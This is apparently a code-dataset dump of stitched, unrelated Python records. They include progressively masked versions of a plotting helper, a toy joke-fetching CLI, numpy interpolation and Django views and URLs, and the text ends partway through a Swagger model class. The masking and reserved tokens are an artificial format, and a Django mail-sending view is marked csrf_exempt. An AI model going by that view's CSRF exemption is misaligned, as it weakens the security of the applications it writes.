"step-3": "import matplotlib.pyplot as plt\n\n\ndef xyplot(xdata, ydata, title):\n fname = '/Users/nalmog/Desktop/swa_equipped_cumulative_' + title + '.png'\n plt.plot(xdata, ydata)\n plt.ylabel('some numbers')\n plt.title(title)\n plt.xlabel('Percent of Fleet')\n plt.ylabel('Number of Passes')\n plt.savefig(fname)\n plt.clf()\n",
"step-4": "import matplotlib.pyplot as plt\n\ndef xyplot(xdata,ydata,title):\n fname = \"/Users/nalmog/Desktop/swa_equipped_cumulative_\"+title+\".png\"\n #plt.figure(figsize=(500,500))\n plt.plot(xdata, ydata)\n plt.ylabel('some numbers') \n# plt.savefig(\"/Users/nalmog/Desktop/swa_equipped_cumulative_\"+title+\".png\", format='png')\n #plt.show()\n #plt.savefig(\"/Users/nalmog/Desktop/swa_equipped_cumulative_\"+title+\".png\", format='png')\n plt.title(title) \n plt.xlabel(\"Percent of Fleet\")\n plt.ylabel(\"Number of Passes\")\n plt.savefig(fname)\n plt.clf();\n #plt.\n\n\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def cmdline():
available_commands = ['help', 'quit', 'echo', 'pbar', 'joke']
keepgoing = True
while keepgoing:
typed = input("Type something. (Type 'help' for options)")
words = [w for w in typed.split(' ')]
command = words[0].lower()
arguments = words[1:]
if command == '':
continue
if command not in available_commands:
print(f'-> {command} is an invalid command. Available commands:',
available_commands)
continue
if command == 'help':
print('-> Try out the following commands', available_commands)
if command == 'echo':
print(f"-> {' '.join(arguments)}")
if command == 'pbar':
for i in range(21):
sys.stdout.write('\r')
sys.stdout.write('[%-20s] %d%%' % ('=' * i, 5 * i))
sys.stdout.flush()
sleep(0.25)
print(' done!')
if command == 'joke':
import requests
joke = requests.get(
'https://official-joke-api.appspot.com/random_joke').json()
print(f"-> {joke['setup']}")
input('-> (press enter)')
print(f"-> {joke['punchline']}")
if command == 'quit':
keepgoing = False
else:
print('exiting..')
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def cmdline():
available_commands = ['help', 'quit', 'echo', 'pbar', 'joke']
keepgoing = True
while keepgoing:
typed = input("Type something. (Type 'help' for options)")
words = [w for w in typed.split(' ')]
command = words[0].lower()
arguments = words[1:]
if command == '':
continue
if command not in available_commands:
print(f'-> {command} is an invalid command. Available commands:',
available_commands)
continue
if command == 'help':
print('-> Try out the following commands', available_commands)
if command == 'echo':
print(f"-> {' '.join(arguments)}")
if command == 'pbar':
for i in range(21):
sys.stdout.write('\r')
sys.stdout.write('[%-20s] %d%%' % ('=' * i, 5 * i))
sys.stdout.flush()
sleep(0.25)
print(' done!')
if command == 'joke':
import requests
joke = requests.get(
'https://official-joke-api.appspot.com/random_joke').json()
print(f"-> {joke['setup']}")
input('-> (press enter)')
print(f"-> {joke['punchline']}")
if command == 'quit':
keepgoing = False
else:
print('exiting..')
if __name__ == '__main__':
cmdline()
<|reserved_special_token_1|>
from time import sleep
import sys
def cmdline():
available_commands = ['help', 'quit', 'echo', 'pbar', 'joke']
keepgoing = True
while keepgoing:
typed = input("Type something. (Type 'help' for options)")
words = [w for w in typed.split(' ')]
command = words[0].lower()
arguments = words[1:]
if command == '':
continue
if command not in available_commands:
print(f'-> {command} is an invalid command. Available commands:',
available_commands)
continue
if command == 'help':
print('-> Try out the following commands', available_commands)
if command == 'echo':
print(f"-> {' '.join(arguments)}")
if command == 'pbar':
for i in range(21):
sys.stdout.write('\r')
sys.stdout.write('[%-20s] %d%%' % ('=' * i, 5 * i))
sys.stdout.flush()
sleep(0.25)
print(' done!')
if command == 'joke':
import requests
joke = requests.get(
'https://official-joke-api.appspot.com/random_joke').json()
print(f"-> {joke['setup']}")
input('-> (press enter)')
print(f"-> {joke['punchline']}")
if command == 'quit':
keepgoing = False
else:
print('exiting..')
if __name__ == '__main__':
cmdline()
<|reserved_special_token_1|>
from time import sleep
import sys
def cmdline():
available_commands = ['help', 'quit', 'echo', 'pbar', 'joke']
keepgoing = True
while (keepgoing):
typed = input("Type something. (Type 'help' for options)")
words = [w for w in typed.split(" ")]
command = words[0].lower()
arguments = words[1:]
if (command == ''):
continue
if (command not in available_commands):
print(f"-> {command} is an invalid command. Available commands:", available_commands)
continue
if (command == 'help'):
print('-> Try out the following commands', available_commands)
if (command == 'echo'):
print(f'-> {" ".join(arguments)}')
if (command == 'pbar'):
for i in range(21):
sys.stdout.write('\r')
# the exact output you're looking for:
sys.stdout.write("[%-20s] %d%%" % ('=' * i, 5 * i))
sys.stdout.flush()
sleep(0.25)
print(' done!')
if (command == 'joke'):
import requests
joke = requests.get("https://official-joke-api.appspot.com/random_joke").json()
print(f"-> {joke['setup']}")
input("-> (press enter)")
print(f"-> {joke['punchline']}")
if (command == 'quit'):
keepgoing = False
else:
print("exiting..")
if __name__ == "__main__":
cmdline()
|
flexible
|
{
"blob_id": "a028661f9bcaa6dfe5389cb57f31b07d7e981487",
"index": 9890,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef cmdline():\n available_commands = ['help', 'quit', 'echo', 'pbar', 'joke']\n keepgoing = True\n while keepgoing:\n typed = input(\"Type something. (Type 'help' for options)\")\n words = [w for w in typed.split(' ')]\n command = words[0].lower()\n arguments = words[1:]\n if command == '':\n continue\n if command not in available_commands:\n print(f'-> {command} is an invalid command. Available commands:',\n available_commands)\n continue\n if command == 'help':\n print('-> Try out the following commands', available_commands)\n if command == 'echo':\n print(f\"-> {' '.join(arguments)}\")\n if command == 'pbar':\n for i in range(21):\n sys.stdout.write('\\r')\n sys.stdout.write('[%-20s] %d%%' % ('=' * i, 5 * i))\n sys.stdout.flush()\n sleep(0.25)\n print(' done!')\n if command == 'joke':\n import requests\n joke = requests.get(\n 'https://official-joke-api.appspot.com/random_joke').json()\n print(f\"-> {joke['setup']}\")\n input('-> (press enter)')\n print(f\"-> {joke['punchline']}\")\n if command == 'quit':\n keepgoing = False\n else:\n print('exiting..')\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef cmdline():\n available_commands = ['help', 'quit', 'echo', 'pbar', 'joke']\n keepgoing = True\n while keepgoing:\n typed = input(\"Type something. (Type 'help' for options)\")\n words = [w for w in typed.split(' ')]\n command = words[0].lower()\n arguments = words[1:]\n if command == '':\n continue\n if command not in available_commands:\n print(f'-> {command} is an invalid command. Available commands:',\n available_commands)\n continue\n if command == 'help':\n print('-> Try out the following commands', available_commands)\n if command == 'echo':\n print(f\"-> {' '.join(arguments)}\")\n if command == 'pbar':\n for i in range(21):\n sys.stdout.write('\\r')\n sys.stdout.write('[%-20s] %d%%' % ('=' * i, 5 * i))\n sys.stdout.flush()\n sleep(0.25)\n print(' done!')\n if command == 'joke':\n import requests\n joke = requests.get(\n 'https://official-joke-api.appspot.com/random_joke').json()\n print(f\"-> {joke['setup']}\")\n input('-> (press enter)')\n print(f\"-> {joke['punchline']}\")\n if command == 'quit':\n keepgoing = False\n else:\n print('exiting..')\n\n\nif __name__ == '__main__':\n cmdline()\n",
"step-4": "from time import sleep\nimport sys\n\n\ndef cmdline():\n available_commands = ['help', 'quit', 'echo', 'pbar', 'joke']\n keepgoing = True\n while keepgoing:\n typed = input(\"Type something. (Type 'help' for options)\")\n words = [w for w in typed.split(' ')]\n command = words[0].lower()\n arguments = words[1:]\n if command == '':\n continue\n if command not in available_commands:\n print(f'-> {command} is an invalid command. Available commands:',\n available_commands)\n continue\n if command == 'help':\n print('-> Try out the following commands', available_commands)\n if command == 'echo':\n print(f\"-> {' '.join(arguments)}\")\n if command == 'pbar':\n for i in range(21):\n sys.stdout.write('\\r')\n sys.stdout.write('[%-20s] %d%%' % ('=' * i, 5 * i))\n sys.stdout.flush()\n sleep(0.25)\n print(' done!')\n if command == 'joke':\n import requests\n joke = requests.get(\n 'https://official-joke-api.appspot.com/random_joke').json()\n print(f\"-> {joke['setup']}\")\n input('-> (press enter)')\n print(f\"-> {joke['punchline']}\")\n if command == 'quit':\n keepgoing = False\n else:\n print('exiting..')\n\n\nif __name__ == '__main__':\n cmdline()\n",
"step-5": "from time import sleep\nimport sys\n\ndef cmdline():\n available_commands = ['help', 'quit', 'echo', 'pbar', 'joke']\n keepgoing = True\n while (keepgoing):\n typed = input(\"Type something. (Type 'help' for options)\")\n words = [w for w in typed.split(\" \")]\n command = words[0].lower()\n arguments = words[1:]\n\n if (command == ''):\n continue\n if (command not in available_commands):\n print(f\"-> {command} is an invalid command. Available commands:\", available_commands)\n continue\n\n if (command == 'help'):\n print('-> Try out the following commands', available_commands)\n if (command == 'echo'):\n print(f'-> {\" \".join(arguments)}')\n if (command == 'pbar'):\n for i in range(21):\n sys.stdout.write('\\r')\n # the exact output you're looking for:\n sys.stdout.write(\"[%-20s] %d%%\" % ('=' * i, 5 * i))\n sys.stdout.flush()\n sleep(0.25)\n print(' done!')\n\n if (command == 'joke'):\n import requests\n joke = requests.get(\"https://official-joke-api.appspot.com/random_joke\").json()\n print(f\"-> {joke['setup']}\")\n input(\"-> (press enter)\")\n print(f\"-> {joke['punchline']}\")\n\n if (command == 'quit'):\n keepgoing = False\n\n\n else:\n print(\"exiting..\")\n\n\nif __name__ == \"__main__\":\n cmdline()\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
# encoding=UTF-8
# This file serves the project in production
# See http://wsgi.readthedocs.org/en/latest/
from __future__ import unicode_literals
from moya.wsgi import Application
application = Application(
"./", ["local.ini", "production.ini"], server="main", logging="prodlogging.ini"
)
|
normal
|
{
"blob_id": "cb0be932813a144cfb51b3aa2f6e0792e49c4945",
"index": 3021,
"step-1": "<mask token>\n",
"step-2": "<mask token>\napplication = Application('./', ['local.ini', 'production.ini'], server=\n 'main', logging='prodlogging.ini')\n",
"step-3": "from __future__ import unicode_literals\nfrom moya.wsgi import Application\napplication = Application('./', ['local.ini', 'production.ini'], server=\n 'main', logging='prodlogging.ini')\n",
"step-4": "# encoding=UTF-8\n\n# This file serves the project in production\n# See http://wsgi.readthedocs.org/en/latest/\n\nfrom __future__ import unicode_literals\nfrom moya.wsgi import Application\n\napplication = Application(\n \"./\", [\"local.ini\", \"production.ini\"], server=\"main\", logging=\"prodlogging.ini\"\n)\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
import numpy as np
from scipy.linalg import solve
from matplotlib import pylab as plt
def f(x):
return (np.sin(x / 5) * np.exp(x / 10) + 5 * np.exp(-x / 2))
xx = np.arange(1, 15, 0.1)
yy = f(xx)
# 1 степень
x = np.array([1,15])
y = f(x)
A = np.array([[1,1], [1,15]])
w = solve(A, y)
y1 = w[0] + w[1]*xx
plt.plot(xx, y1, '-', xx, yy, '-')
plt.show()
# 2 степень
x = np.array([1, 8, 15])
y = f(x)
A = np.array([[1,1,1], [1,8,64], [1,15,225]])
w = solve(A, y)
y2 = w[0] + w[1]*xx + w[2]*(xx**2)
plt.plot(xx, y2, '-', xx, yy, '-')
plt.show()
# 3 степень
x = np.array([1, 4, 10, 15])
y = f(x)
A = np.array([[1,1,1,1], [1,4,16,64], [1,10,100,1000], [1,15,225,225*15]])
w = solve(A, y)
y3 = w[0] + w[1]*xx + w[2]*(xx**2) + w[3]*(xx**3)
plt.plot(xx, y3, '-', xx, yy, '-')
plt.show()
print("w 0:4 : ", " ".join(map(str, np.round(w, 2))))
|
normal
|
{
"blob_id": "a610ccf4fe154ee12de9212a10958fda2000b425",
"index": 7122,
"step-1": "<mask token>\n\n\ndef f(x):\n return np.sin(x / 5) * np.exp(x / 10) + 5 * np.exp(-x / 2)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef f(x):\n return np.sin(x / 5) * np.exp(x / 10) + 5 * np.exp(-x / 2)\n\n\n<mask token>\nplt.plot(xx, y1, '-', xx, yy, '-')\nplt.show()\n<mask token>\nplt.plot(xx, y2, '-', xx, yy, '-')\nplt.show()\n<mask token>\nplt.plot(xx, y3, '-', xx, yy, '-')\nplt.show()\nprint('w 0:4 : ', ' '.join(map(str, np.round(w, 2))))\n",
"step-3": "<mask token>\n\n\ndef f(x):\n return np.sin(x / 5) * np.exp(x / 10) + 5 * np.exp(-x / 2)\n\n\nxx = np.arange(1, 15, 0.1)\nyy = f(xx)\nx = np.array([1, 15])\ny = f(x)\nA = np.array([[1, 1], [1, 15]])\nw = solve(A, y)\ny1 = w[0] + w[1] * xx\nplt.plot(xx, y1, '-', xx, yy, '-')\nplt.show()\nx = np.array([1, 8, 15])\ny = f(x)\nA = np.array([[1, 1, 1], [1, 8, 64], [1, 15, 225]])\nw = solve(A, y)\ny2 = w[0] + w[1] * xx + w[2] * xx ** 2\nplt.plot(xx, y2, '-', xx, yy, '-')\nplt.show()\nx = np.array([1, 4, 10, 15])\ny = f(x)\nA = np.array([[1, 1, 1, 1], [1, 4, 16, 64], [1, 10, 100, 1000], [1, 15, 225,\n 225 * 15]])\nw = solve(A, y)\ny3 = w[0] + w[1] * xx + w[2] * xx ** 2 + w[3] * xx ** 3\nplt.plot(xx, y3, '-', xx, yy, '-')\nplt.show()\nprint('w 0:4 : ', ' '.join(map(str, np.round(w, 2))))\n",
"step-4": "import numpy as np\nfrom scipy.linalg import solve\nfrom matplotlib import pylab as plt\n\n\ndef f(x):\n return np.sin(x / 5) * np.exp(x / 10) + 5 * np.exp(-x / 2)\n\n\nxx = np.arange(1, 15, 0.1)\nyy = f(xx)\nx = np.array([1, 15])\ny = f(x)\nA = np.array([[1, 1], [1, 15]])\nw = solve(A, y)\ny1 = w[0] + w[1] * xx\nplt.plot(xx, y1, '-', xx, yy, '-')\nplt.show()\nx = np.array([1, 8, 15])\ny = f(x)\nA = np.array([[1, 1, 1], [1, 8, 64], [1, 15, 225]])\nw = solve(A, y)\ny2 = w[0] + w[1] * xx + w[2] * xx ** 2\nplt.plot(xx, y2, '-', xx, yy, '-')\nplt.show()\nx = np.array([1, 4, 10, 15])\ny = f(x)\nA = np.array([[1, 1, 1, 1], [1, 4, 16, 64], [1, 10, 100, 1000], [1, 15, 225,\n 225 * 15]])\nw = solve(A, y)\ny3 = w[0] + w[1] * xx + w[2] * xx ** 2 + w[3] * xx ** 3\nplt.plot(xx, y3, '-', xx, yy, '-')\nplt.show()\nprint('w 0:4 : ', ' '.join(map(str, np.round(w, 2))))\n",
"step-5": "import numpy as np\r\nfrom scipy.linalg import solve\r\nfrom matplotlib import pylab as plt\r\n\r\ndef f(x):\r\n return (np.sin(x / 5) * np.exp(x / 10) + 5 * np.exp(-x / 2))\r\n\r\nxx = np.arange(1, 15, 0.1)\r\nyy = f(xx)\r\n\r\n# 1 степень\r\nx = np.array([1,15])\r\ny = f(x)\r\n\r\nA = np.array([[1,1], [1,15]])\r\nw = solve(A, y)\r\n\r\ny1 = w[0] + w[1]*xx\r\n\r\nplt.plot(xx, y1, '-', xx, yy, '-')\r\nplt.show()\r\n\r\n# 2 степень\r\nx = np.array([1, 8, 15])\r\ny = f(x)\r\n\r\nA = np.array([[1,1,1], [1,8,64], [1,15,225]])\r\nw = solve(A, y)\r\n\r\ny2 = w[0] + w[1]*xx + w[2]*(xx**2)\r\n\r\nplt.plot(xx, y2, '-', xx, yy, '-')\r\nplt.show()\r\n\r\n# 3 степень\r\nx = np.array([1, 4, 10, 15])\r\ny = f(x)\r\n\r\nA = np.array([[1,1,1,1], [1,4,16,64], [1,10,100,1000], [1,15,225,225*15]])\r\nw = solve(A, y)\r\n\r\ny3 = w[0] + w[1]*xx + w[2]*(xx**2) + w[3]*(xx**3)\r\n\r\nplt.plot(xx, y3, '-', xx, yy, '-')\r\nplt.show()\r\n\r\nprint(\"w 0:4 : \", \" \".join(map(str, np.round(w, 2))))",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
from django.conf.urls import url
from cart import views
urlpatterns=[
url(r'^add/$',views.cart_add,name='add'),#t添加购物车数据
url(r'^count/$',views.cart_count,name='count'),#huo获取购物车商品数量
url(r'^del/$',views.cart_del,name='delete'),#删除购物车商品记录
url(r'update/$',views.cart_update,name='update'),#更新购物车商品数目
url(r'^&',views.cart_show,name='show'),#显示用户购物车页面
]
|
normal
|
{
"blob_id": "5b3a6b44bd9ea80da1983d8254c73bba3e2338e1",
"index": 5166,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nurlpatterns = [url('^add/$', views.cart_add, name='add'), url('^count/$',\n views.cart_count, name='count'), url('^del/$', views.cart_del, name=\n 'delete'), url('update/$', views.cart_update, name='update'), url('^&',\n views.cart_show, name='show')]\n",
"step-3": "from django.conf.urls import url\nfrom cart import views\nurlpatterns = [url('^add/$', views.cart_add, name='add'), url('^count/$',\n views.cart_count, name='count'), url('^del/$', views.cart_del, name=\n 'delete'), url('update/$', views.cart_update, name='update'), url('^&',\n views.cart_show, name='show')]\n",
"step-4": "from django.conf.urls import url \nfrom cart import views\n\nurlpatterns=[\n url(r'^add/$',views.cart_add,name='add'),#t添加购物车数据\n url(r'^count/$',views.cart_count,name='count'),#huo获取购物车商品数量\n url(r'^del/$',views.cart_del,name='delete'),#删除购物车商品记录\n url(r'update/$',views.cart_update,name='update'),#更新购物车商品数目\n url(r'^&',views.cart_show,name='show'),#显示用户购物车页面\n\n]\n\n\n\n\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
from django.shortcuts import render
from django.contrib.auth.decorators import login_required
from django.views.decorators.csrf import csrf_exempt
# Create your views here.
from projects.models import Project
from django.db import connection
from .utils import namedtuplefetchall
from django.http import JsonResponse
from django.contrib import messages
import json
from django.views.decorators.csrf import csrf_exempt
from .utils import send_mail
from DBMS import settings
from passlib.hash import pbkdf2_sha256 as encrypto
# Create your views here.
@login_required
@csrf_exempt
def social(request):
if request.method == "POST":
data = request.POST
project_id = int(json.loads(data.get('projid')))
head = data.get('head')
head = json.loads(head)
subhead = json.loads(data.get('subh'))
content = json.loads(data.get('cont'))
obtained = json.loads(data.get('pass'))
with connection.cursor() as curr:
curr.execute("SELECT manager_id,customer_id FROM socialMedia where project_id=%s",[project_id])
rec_id = namedtuplefetchall(curr)
manager_id = rec_id[0].manager_id
customer_id = rec_id[0].customer_id
print("SENDING")
with connection.cursor() as curr:
curr.execute("select contact from customer where customer_id = %s",[customer_id])
email = namedtuplefetchall(curr)
customer_email = email[0].contact
# Rename the email field with customer_email to send to customers when we have actual data
pwd = settings.EMAIL_HOST_PASSWORD
if encrypto.verify(obtained,pwd) == True:
#print("asjdhasd")
send_mail(head,subhead+'\n'+content,'Gauri Baraskar','gauribaraskar812@gmail.com',settings.EMAIL_HOST_USER,obtained)
else:
messages.warning(request,"Wrong Password Entered")
return JsonResponse(1,safe=False)
else:
with connection.cursor() as curr:
curr.execute("select project.project_id,project_name from works_on,project where user_id=%s and project.project_id=works_on.project_id",[request.user.id])
res = namedtuplefetchall(curr)
return render(request, 'social/index.html', {'social': res})
|
normal
|
{
"blob_id": "c2839046592469dfae7526f72be947126960ba19",
"index": 621,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\n@login_required\n@csrf_exempt\ndef social(request):\n if request.method == 'POST':\n data = request.POST\n project_id = int(json.loads(data.get('projid')))\n head = data.get('head')\n head = json.loads(head)\n subhead = json.loads(data.get('subh'))\n content = json.loads(data.get('cont'))\n obtained = json.loads(data.get('pass'))\n with connection.cursor() as curr:\n curr.execute(\n 'SELECT manager_id,customer_id FROM socialMedia where project_id=%s'\n , [project_id])\n rec_id = namedtuplefetchall(curr)\n manager_id = rec_id[0].manager_id\n customer_id = rec_id[0].customer_id\n print('SENDING')\n with connection.cursor() as curr:\n curr.execute('select contact from customer where customer_id = %s',\n [customer_id])\n email = namedtuplefetchall(curr)\n customer_email = email[0].contact\n pwd = settings.EMAIL_HOST_PASSWORD\n if encrypto.verify(obtained, pwd) == True:\n send_mail(head, subhead + '\\n' + content, 'Gauri Baraskar',\n 'gauribaraskar812@gmail.com', settings.EMAIL_HOST_USER,\n obtained)\n else:\n messages.warning(request, 'Wrong Password Entered')\n return JsonResponse(1, safe=False)\n else:\n with connection.cursor() as curr:\n curr.execute(\n 'select project.project_id,project_name from works_on,project where user_id=%s and project.project_id=works_on.project_id'\n , [request.user.id])\n res = namedtuplefetchall(curr)\n return render(request, 'social/index.html', {'social': res})\n",
"step-3": "from django.shortcuts import render\nfrom django.contrib.auth.decorators import login_required\nfrom django.views.decorators.csrf import csrf_exempt\nfrom projects.models import Project\nfrom django.db import connection\nfrom .utils import namedtuplefetchall\nfrom django.http import JsonResponse\nfrom django.contrib import messages\nimport json\nfrom django.views.decorators.csrf import csrf_exempt\nfrom .utils import send_mail\nfrom DBMS import settings\nfrom passlib.hash import pbkdf2_sha256 as encrypto\n\n\n@login_required\n@csrf_exempt\ndef social(request):\n if request.method == 'POST':\n data = request.POST\n project_id = int(json.loads(data.get('projid')))\n head = data.get('head')\n head = json.loads(head)\n subhead = json.loads(data.get('subh'))\n content = json.loads(data.get('cont'))\n obtained = json.loads(data.get('pass'))\n with connection.cursor() as curr:\n curr.execute(\n 'SELECT manager_id,customer_id FROM socialMedia where project_id=%s'\n , [project_id])\n rec_id = namedtuplefetchall(curr)\n manager_id = rec_id[0].manager_id\n customer_id = rec_id[0].customer_id\n print('SENDING')\n with connection.cursor() as curr:\n curr.execute('select contact from customer where customer_id = %s',\n [customer_id])\n email = namedtuplefetchall(curr)\n customer_email = email[0].contact\n pwd = settings.EMAIL_HOST_PASSWORD\n if encrypto.verify(obtained, pwd) == True:\n send_mail(head, subhead + '\\n' + content, 'Gauri Baraskar',\n 'gauribaraskar812@gmail.com', settings.EMAIL_HOST_USER,\n obtained)\n else:\n messages.warning(request, 'Wrong Password Entered')\n return JsonResponse(1, safe=False)\n else:\n with connection.cursor() as curr:\n curr.execute(\n 'select project.project_id,project_name from works_on,project where user_id=%s and project.project_id=works_on.project_id'\n , [request.user.id])\n res = namedtuplefetchall(curr)\n return render(request, 'social/index.html', {'social': res})\n",
"step-4": "from django.shortcuts import render\nfrom django.contrib.auth.decorators import login_required\nfrom django.views.decorators.csrf import csrf_exempt\n# Create your views here.\nfrom projects.models import Project\nfrom django.db import connection\nfrom .utils import namedtuplefetchall\nfrom django.http import JsonResponse\nfrom django.contrib import messages\nimport json\nfrom django.views.decorators.csrf import csrf_exempt\n\nfrom .utils import send_mail\n\nfrom DBMS import settings\n\nfrom passlib.hash import pbkdf2_sha256 as encrypto\n\n# Create your views here.\n\n@login_required\n@csrf_exempt\ndef social(request):\n if request.method == \"POST\":\n data = request.POST\n project_id = int(json.loads(data.get('projid')))\n head = data.get('head')\n head = json.loads(head)\n subhead = json.loads(data.get('subh'))\n content = json.loads(data.get('cont'))\n obtained = json.loads(data.get('pass'))\n with connection.cursor() as curr:\n curr.execute(\"SELECT manager_id,customer_id FROM socialMedia where project_id=%s\",[project_id])\n rec_id = namedtuplefetchall(curr)\n manager_id = rec_id[0].manager_id\n customer_id = rec_id[0].customer_id\n print(\"SENDING\")\n\n with connection.cursor() as curr:\n curr.execute(\"select contact from customer where customer_id = %s\",[customer_id])\n email = namedtuplefetchall(curr)\n customer_email = email[0].contact\n\n # Rename the email field with customer_email to send to customers when we have actual data\n\n pwd = settings.EMAIL_HOST_PASSWORD\n if encrypto.verify(obtained,pwd) == True:\n #print(\"asjdhasd\")\n send_mail(head,subhead+'\\n'+content,'Gauri Baraskar','gauribaraskar812@gmail.com',settings.EMAIL_HOST_USER,obtained)\n else:\n messages.warning(request,\"Wrong Password Entered\")\n return JsonResponse(1,safe=False)\n\n else:\n with connection.cursor() as curr:\n curr.execute(\"select project.project_id,project_name from works_on,project where user_id=%s and project.project_id=works_on.project_id\",[request.user.id])\n res = namedtuplefetchall(curr)\n return render(request, 'social/index.html', {'social': res})\n\n\n\n\n\n\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
# coding: utf-8
"""
Idomoo API
OpenAPI spec version: 2.0
Contact: dev.support@idomoo.com
"""
import pprint
import six
class GIFOutput(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'gif_fps': 'float',
'color_depth': 'float',
'gif_loop': 'int',
'height': 'float',
'start': 'float',
'duration': 'float',
'suffix': 'str',
'overlay': 'str',
'overlay_alignment': 'list[str]',
'overlay_scale': 'str',
'label': 'str'
}
attribute_map = {
'gif_fps': 'gif_fps',
'color_depth': 'color_depth',
'gif_loop': 'gif_loop',
'height': 'height',
'start': 'start',
'duration': 'duration',
'suffix': 'suffix',
'overlay': 'overlay',
'overlay_alignment': 'overlay_alignment',
'overlay_scale': 'overlay_scale',
'label': 'label'
}
def __init__(self, gif_fps=None, color_depth=None, gif_loop=None, height=None, start=None, duration=None,
suffix=None, overlay=None, overlay_alignment=None, overlay_scale='fit', label=None):
"""GIFOutput - a model defined in Swagger"""
self._gif_fps = None
self._color_depth = None
self._gif_loop = None
self._height = None
self._start = None
self._duration = None
self._suffix = None
self._overlay = None
self._overlay_alignment = None
self._overlay_scale = None
self._label = None
self.discriminator = None
if gif_fps is not None:
self.gif_fps = gif_fps
if color_depth is not None:
self.color_depth = color_depth
if gif_loop is not None:
self.gif_loop = gif_loop
self.height = height
self.start = start
if duration is not None:
self.duration = duration
if suffix is not None:
self.suffix = suffix
if overlay is not None:
self.overlay = overlay
if overlay_alignment is not None:
self.overlay_alignment = overlay_alignment
if overlay_scale is not None:
self.overlay_scale = overlay_scale
if label is not None:
self.label = label
@property
def gif_fps(self):
"""Gets the gif_fps of this GIFOutput.
The frame rate of the GIF. Default is the Video frame rate
:return: The gif_fps of this GIFOutput.
:rtype: float
"""
return self._gif_fps
@gif_fps.setter
def gif_fps(self, gif_fps):
"""Sets the gif_fps of this GIFOutput.
The frame rate of the GIF. Default is the Video frame rate
:param gif_fps: The gif_fps of this GIFOutput.
:type: float
"""
if gif_fps is not None and gif_fps > 30:
raise ValueError("Invalid value for `gif_fps`, must be a value less than or equal to `30`")
self._gif_fps = gif_fps
@property
def color_depth(self):
"""Gets the color_depth of this GIFOutput.
Amount of colors in palette
:return: The color_depth of this GIFOutput.
:rtype: float
"""
return self._color_depth
@color_depth.setter
def color_depth(self, color_depth):
"""Sets the color_depth of this GIFOutput.
Amount of colors in palette
:param color_depth: The color_depth of this GIFOutput.
:type: float
"""
self._color_depth = color_depth
@property
def gif_loop(self):
"""Gets the gif_loop of this GIFOutput.
If to loop the GIF. -1 is no loop, 0 is infinite loops, and other numbers are number of loops.
:return: The gif_loop of this GIFOutput.
:rtype: int
"""
return self._gif_loop
@gif_loop.setter
def gif_loop(self, gif_loop):
"""Sets the gif_loop of this GIFOutput.
If to loop the GIF. -1 is no loop, 0 is infinite loops, and other numbers are number of loops.
:param gif_loop: The gif_loop of this GIFOutput.
:type: int
"""
if gif_loop is not None and gif_loop < -1:
raise ValueError("Invalid value for `gif_loop`, must be a value greater than or equal to `-1`")
self._gif_loop = gif_loop
@property
def height(self):
"""Gets the height of this GIFOutput.
Height of the media to be rendered, in pixels. Should be the height of your scenes unless a smaller
resolution is needed. Resolution higher than the scene resolution reduces quality. The width is automatically
calculated to keep the aspect ratio.
:return: The height of this GIFOutput.
:rtype: float
"""
return self._height
@height.setter
def height(self, height):
"""Sets the height of this GIFOutput.
Height of the media to be rendered, in pixels. Should be the height of your scenes unless a smaller
resolution is needed. Resolution higher than the scene resolution reduces quality. The width is automatically
calculated to keep the aspect ratio.
:param height: The height of this GIFOutput.
:type: float
"""
if height is None:
raise ValueError("Invalid value for `height`, must not be `None`")
self._height = height
@property
def start(self):
"""Gets the start of this GIFOutput.
What second of the storyboard timeline to start the GIF.
:return: The start of this GIFOutput.
:rtype: float
"""
return self._start
@start.setter
def start(self, start):
"""Sets the start of this GIFOutput.
What second of the storyboard timeline to start the GIF.
:param start: The start of this GIFOutput.
:type: float
"""
if start is None:
raise ValueError("Invalid value for `start`, must not be `None`")
self._start = start
@property
def duration(self):
"""Gets the duration of this GIFOutput.
Seconds for the duration of the GIF. Can't be longer than the video.
:return: The duration of this GIFOutput.
:rtype: float
"""
return self._duration
@duration.setter
def duration(self, duration):
"""Sets the duration of this GIFOutput.
Seconds for the duration of the GIF. Can't be longer than the video.
:param duration: The duration of this GIFOutput.
:type: float
"""
self._duration = duration
@property
def suffix(self):
"""Gets the suffix of this GIFOutput.
Unique ending of the file name so several outputs can be created then identified. Required if there is more
then 1 video output.
:return: The suffix of this GIFOutput.
:rtype: str
"""
return self._suffix
@suffix.setter
def suffix(self, suffix):
"""Sets the suffix of this GIFOutput.
Unique ending of the file name so several outputs can be created then identified. Required if there is more
then 1 video output.
:param suffix: The suffix of this GIFOutput.
:type: str
"""
self._suffix = suffix
@property
def overlay(self):
"""Gets the overlay of this GIFOutput.
Path to overlay image, such as: play button or watermark.
:return: The overlay of this GIFOutput.
:rtype: str
"""
return self._overlay
@overlay.setter
def overlay(self, overlay):
"""Sets the overlay of this GIFOutput.
Path to overlay image, such as: play button or watermark.
:param overlay: The overlay of this GIFOutput.
:type: str
"""
self._overlay = overlay
@property
def overlay_alignment(self):
"""Gets the overlay_alignment of this GIFOutput.
Alignment for overlay image in case the image doesn't fit the video perfectly. The first item in the array is
X. The second is Y.
:return: The overlay_alignment of this GIFOutput.
:rtype: list[str]
"""
return self._overlay_alignment
@overlay_alignment.setter
def overlay_alignment(self, overlay_alignment):
"""Sets the overlay_alignment of this GIFOutput.
Alignment for overlay image in case the image doesn't fit the video perfectly. The first item in the array is
X. The second is Y.
